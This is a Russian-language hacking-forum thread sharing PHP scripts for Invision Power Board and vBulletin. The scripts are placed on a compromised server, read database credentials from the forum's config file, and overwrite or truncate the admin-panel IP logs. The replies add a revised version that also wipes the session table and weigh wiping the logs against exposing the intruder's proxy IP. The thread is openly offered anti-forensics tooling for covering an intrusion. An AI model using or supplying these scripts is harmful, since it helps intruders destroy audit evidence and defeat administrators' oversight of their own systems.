• XSS.stack #1 – первый литературный журнал от юзеров форума

Чистим логи в ipb и vbulletin

Отслеживать

gemaglabin

(L1) cache
Пользователь
Регистрация
28.08.2005
Сообщения
703
Реакции
0
Вообщем накатал два скрипта,могут поменять ip адреса в логах пребывания в админ панели или полность очистить таблицу.

Возможно где-то еще хранятся айпи,я не в курсе,но по аналогии можно дописать

Ах да,скрипты берут информацию для коннекта из конфигурационных файлов форума,те кидать надо в корень сервера.

Invision Power Board

Код: 
<FORM NAME=check METHOD=POST ACTION='?change'>
<TD>Change IP To</TD>
<TD><INPUT NAME=ip TYPE=text CLASS=text Value=></TD>
<TD WIDTH=10%><input class=text type=submit value='change ip'></TD>
</Form>
<FORM NAME=check METHOD=POST ACTION='?clean'>
<TD>Clean  Logs</TD>
<TD WIDTH=10%><input class=text type=submit value='clean logs'></TD>
</Form>
<?php
if (isset($_GET['change']) || isset($_GET['clean']))
{ 
 require_once('./conf_global.php');

 $dbtype  = $INFO ['sql_driver']; 
 $dbname  = $INFO ['sql_database'];
 $prefix  = $INFO ['sql_tbl_prefix'];
 $server  = $INFO ['sql_host'];
 $sqluser = $INFO ['sql_user'];
 $sqlpass = $INFO ['sql_pass'];

 $db      = mysql_connect($server,$sqluser, $sqlpass);
 if (!$db) die ("cannot connect to mysql host");
 mysql_SELECT_db($dbname);
 if (isset($_POST['ip']) && !empty($_POST['ip']))
 { 
  $newip  = $_POST['ip'];
  $sql    = 'UPDATE `'.$prefix.'admin_logs` SET `ip_address` = '.$newip;
  $result = mysql_query ($sql);
  if (!$result) die("cannot execute sql query ".mysql_error());
  echo "all ip addresses were updated to $newip";
 }
 if (isset($_GET['clean']))
 {
  $sql     = 'TRUNCATE TABLE `'.$prefix.'admin_logs`';
  $result  = mysql_query ($sql);
  if (!$result) die("cannot execute sql query ".mysql_error());
  echo "all ip addresses were destroyed";
 }
}
?>

vBulletion Board

Код: 
<FORM NAME=check METHOD=POST ACTION='?change'>
<TD>Change IP To</TD>
<TD><INPUT NAME=ip TYPE=text CLASS=text Value=></TD>
<TD WIDTH=10%><input class=text type=submit value='change ip'></TD>
</Form>
<FORM NAME=check METHOD=POST ACTION='?clean'>
<TD>Clean  Logs</TD>
<TD WIDTH=10%><input class=text type=submit value='clean logs'></TD>
</Form>
<?php
if (isset($_GET['change']) || isset($_GET['clean']))
{ 
 require_once('./includes/config.php');

 $dbtype  = $config['Database']['dbtype']; 
 $dbname  = $config['Database']['dbname'];
 $prefix  = $config['Database']['tableprefix'];
 $server  = $config['MasterServer']['servername'];
 $port    = $config['MasterServer']['port'];
 $sqluser = $config['MasterServer']['username'];
 $sqlpass = $config['MasterServer']['password'];

 $db      = mysql_connect($server,$sqluser, $sqlpass);
 if (!$db) die ("cannot connect to mysql host");
 mysql_SELECT_db($dbname);
 if (isset($_POST['ip']) && !empty($_POST['ip']))
 { 
  $newip  = $_POST['ip'];
  $sql    = 'UPDATE `adminlog` SET `ipaddress` = '.$newip;
  $result = mysql_query ($sql);
  if (!$result) die("cannot execute sql query ".mysql_error());
  echo "all ip addresses were updated to $newip";
 }
 if (isset($_GET['clean']))
 {
  $sql     = 'TRUNCATE TABLE `adminlog`';
  $result = mysql_query ($sql);
  if (!$result) die("cannot execute sql query ".mysql_error());
  echo "all ip addresses were destroyed";
 }
}
?>

Ну или скачать = )

http://www.mytempdir.com/915084
 
Э... М... Я, конечно, могу могу ошибаться, но, мне кажется, для очистки базы (ipb) много быстрее следующий вариант:

Код: 
Управление SQL -> Утилита -> truncate ibf_admin_logs
Время экономится в разы. Но это только для очистки, естественно.
 
Очистка вызовет подозрение
Она то вызовет, но как думаеш, что лучше :
1 - Вызвать подозрение.
2 - Спалить свой ип с беспл. прокси, да и вообще админ тож свой ип знает, а леваковый сразу кинется в глаза! Лучше удалить все, от греха подальше :)
 
...для воблы у меня не заработало, пришлось править(не ругайте, у меня такой код работает, а на пхп я не пишу, пришлось маны поднимать)...
Код: 
<FORM NAME=check METHOD=POST ACTION='?change'>
<TD>Change IP To</TD>
<TD><INPUT NAME=ip TYPE=text CLASS=text Value=></TD>
<TD WIDTH=10%><input class=text type=submit value='change ip'></TD>
</Form>
<FORM NAME=check METHOD=POST ACTION='?clean'>
<TD>Clean  Logs</TD>
<TD WIDTH=10%><input class=text type=submit value='clean logs'></TD>
</Form>
<?php
if (isset($_GET['change']) || isset($_GET['clean']))
{
require_once('./includes/config.php');

$dbtype  = $config['Database']['dbtype'];
$dbname  = $config['Database']['dbname'];
$prefix  = $config['Database']['tableprefix'];
$server  = $config['MasterServer']['servername'];
$port    = $config['MasterServer']['port'];
$sqluser = $config['MasterServer']['username'];
$sqlpass = $config['MasterServer']['password'];

$db = mysql_connect($server,$sqluser,$sqlpass)or die("Could not connect : " . mysql_error());

mysql_select_db($dbname)or die("Could not select database");
if (isset($_POST['ip']) && !empty($_POST['ip']))
{
 $newip  = $_POST['ip'];
 $sql    = sprintf('UPDATE `%sadminlog` SET `ipaddress` = "%s"',$prefix,$newip);
 $result = mysql_query ($sql);
 if (!$result) die("cannot execute sql query ".mysql_error());
 
 $sql2    = sprintf('UPDATE `%ssession` SET `host` = "%s"',$prefix,$newip);
 $result = mysql_query ($sql2);
 if (!$result) die("cannot execute sql query ".mysql_error());
 echo "all ip addresses were updated to $newip";

}
if (isset($_GET['clean']))
{
 $sql = sprintf("TRUNCATE TABLE `%sadminlog`",$prefix);
 $result = mysql_query ($sql);
 if (!$result) die("cannot execute sql query ".mysql_error());
 
 $sql2 = sprintf("TRUNCATE TABLE `%ssession`",$prefix);
 $result = mysql_query ($sql2);
 if (!$result) die("cannot execute sql query ".mysql_error());
 
 echo "all ip addresses were destroyed";
}
}
?>
...вот как-то так...
...кто укажет на ошибки - буду благодарен...
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх